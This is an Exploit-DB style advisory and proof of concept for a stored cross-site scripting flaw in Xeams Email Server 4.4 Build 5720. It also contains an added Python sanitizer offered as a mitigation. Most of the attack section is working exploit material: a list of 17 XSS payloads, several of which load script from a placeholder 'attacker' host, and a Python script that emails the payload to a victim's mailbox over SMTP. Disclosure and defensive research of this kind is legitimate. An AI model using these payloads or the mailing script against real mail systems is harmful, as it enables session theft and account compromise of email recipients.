Vendor: Xeams Email Server
By: loneferret of Offensive Security
CVSS: 7.5 (HIGH)
CWE: 79, Cross-Site Scripting (XSS)
Product Name: Xeams Email Server
Affected Version From: 4.4 Build 5720
Affected Version To: 4.4 Build 5720
Patch Exists: NO
Platforms Tested: Windows Server 2003 SP2
2012

Xeams Email Server XSS Vulnerability

Xeams Email Server version 4.4 Build 5720 is vulnerable to Cross-Site Scripting (XSS). An attacker can inject malicious scripts into the body of an email, and they are executed when the recipient views the email. This can lead to unauthorized access, data theft, or further attacks on the victim's system.

Mitigation:

Upgrade to a patched version of Xeams Email Server. No other mitigation measures are provided.
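
With no patch listed, one compensating control is to neutralise HTML bodies before they are stored or rendered. The following is an added example (not from the advisory, the exploit author or the vendor) of an allowlist sanitizer for text/html parts; the function names, the allowlist and running it as a filter ahead of the mail server are assumptions.

```python
import html
from email import message_from_string, policy
from html.parser import HTMLParser

# Assumption: a deliberately small allowlist; tags outside it are dropped.
ALLOWED = {"p", "b", "i", "em", "strong", "ul", "ol", "li", "pre", "blockquote"}
DROP_CONTENT = {"script", "style"}  # text inside these elements is discarded

class AllowlistSanitizer(HTMLParser):
    """Rebuild the body from parser events: bare allowlisted tags, escaped text."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
        elif tag in ALLOWED and not self.skip:
            self.out.append("<%s>" % tag)  # attributes are never copied

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif tag in ALLOWED and not self.skip:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data))  # stray "<" becomes "&lt;"

def sanitize_html(body):
    parser = AllowlistSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)

def sanitize_message(raw):
    """Rewrite every text/html part of a raw RFC 5322 message in place."""
    msg = message_from_string(raw, policy=policy.default)
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            part.set_content(sanitize_html(part.get_content()), subtype="html")
    return msg

# Constructed sample: an HTML body carrying payload 4 from the advisory.
RAW = ("From: a@example.invalid\nTo: b@example.invalid\nSubject: test\n"
       "Content-Type: text/html\n\n<p>Hello</p><SCRIPT>alert('XSS')</SCRIPT>\n")

if __name__ == "__main__":
    print(sanitize_message(RAW).get_content())
```

Because the output is rebuilt only from allowlisted tag names and escaped text, malformed markup cannot pass through as an active element; an unclosed SCRIPT element causes the rest of the body to be dropped.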

Exploit-DB raw data:

#!/usr/bin/python

'''

Author: loneferret of Offensive Security
Product: Xeams Email Server
Version: 4.4 Build 5720
Vendor Site: http://www.xeams.com

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public Disclosure

Installed On: Windows Server 2003 SP2
Client Test OS: Windows 7 Pro SP1 (x86)
Browser Used: Internet Explorer 9

Injection Point: Body
Injection Payload(s):
1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} 
2: <SCRIPT SRC=http://attacker/xss.js></SCRIPT> 
3: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 
4: <SCRIPT>alert('XSS')</SCRIPT> 
5: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
6: </TITLE><SCRIPT>alert("XSS");</SCRIPT> 
7: <SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT> 
8: <<SCRIPT>alert("XSS");//<</SCRIPT> 
9: <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> 
10: <SCRIPT>a=/XSS/
alert(a.source)</SCRIPT> 
11: <SCRIPT ="blah" SRC="http://attacker/xss.js"></SCRIPT> 
12: <SCRIPT a="blah" '' SRC="http://attacker/xss.js"></SCRIPT> 
13: <SCRIPT a=">" SRC="http://attacker/xss.js"></SCRIPT>
14: <SCRIPT "a='>'" SRC="http://attacker/xss.js"></SCRIPT> 
15: <SCRIPT a=`>` SRC="http://attacker/xss.js"></SCRIPT> 
16: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://attacker/xss.js"></SCRIPT> 
17: <SCRIPT a=">'>" SRC="http://attacker/xss.js"></SCRIPT>

'''


import smtplib, urllib2
 
payload = """<SCRIPT SRC=http://attacker/xss.js></SCRIPT>"""
 
def sendMail(dstemail, frmemail, smtpsrv, username, password):
        msg  = "From: hacker@offsec.local\n"
        msg += "To: victim@victim.local\n"
        msg += 'Date: Today\r\n'
        msg += "Subject: Offensive Security\n"
        msg += "Content-type: text/html\n\n"
        msg += "XSS" + payload + "\r\n\r\n"
        server = smtplib.SMTP(smtpsrv)
        server.login(username,password)
        try:
                server.sendmail(frmemail, dstemail, msg)
        except Exception, e:
                print "[-] Failed to send email:"
                print "[*] " + str(e)
        server.quit()
 
username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv  = "172.16.84.171"
 
print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)